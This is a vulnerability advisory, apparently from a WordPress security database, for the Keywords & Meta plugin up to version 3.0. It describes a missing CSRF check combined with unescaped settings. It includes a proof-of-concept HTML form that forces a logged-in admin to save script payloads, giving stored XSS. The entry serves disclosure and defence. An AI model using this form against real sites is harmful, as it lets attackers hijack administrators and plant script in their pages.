WordPress Plugin Vulnerabilities
Keywords & Meta <= 3.0 - CSRF to Stored Cross-Site Scripting (XSS)
Description
The plugin does not sanitise of escape its settings before outputting them back in the page after they are saved, allowing for Cross-Site Scripting issues. Furthermore, it is also lacking any CSRF check, allowing attacker to make a logged in high privilege user save arbitrary setting via a CSRF attack.
Versions 3.1 & 3.2 added sanitisation/escaping, but still missing CSRF, the plugin has been permanently closed.
Proof of Concept
<html> <body> <form action="https://example.com/wp-admin/options-general.php?page=keyword-meta%2Fkeyword-meta.php" method="POST"> <input type="hidden" name="keywords_add" value="0" /> <input type="hidden" name="keywords_edit" value="" /> <input type="hidden" name="description_edit" value="</textarea><script>alert(/XSS-Desc/)</script>" /> <input type="hidden" name="og_enable" value="0" /> <input type="hidden" name="og_type_edit" value="0" /> <input type="hidden" name="og_title_all" value="0" /> <input type="hidden" name="og_url_edit" value="0" /> <input type="hidden" name="og_image_edit" value="0" /> <input type="hidden" name="og_image_all" value="0" /> <input type="hidden" name="apple_icon_edit" value="0" /> <input type="hidden" name="android_icon_edit" value="0" /> <input type="hidden" name="mobile_restrict_viewport" value="0" /> <input type="hidden" name="google_verify_edit" value='"><script>alert(/XSS-Goole-Code)</script>' /> <input type="submit" value="Submit request" /> </form> </body> </html>
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Genubhau wayal
Submitter
Genubhau Wayal
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-08-09 (about 2 years ago)
Added
2021-08-09 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)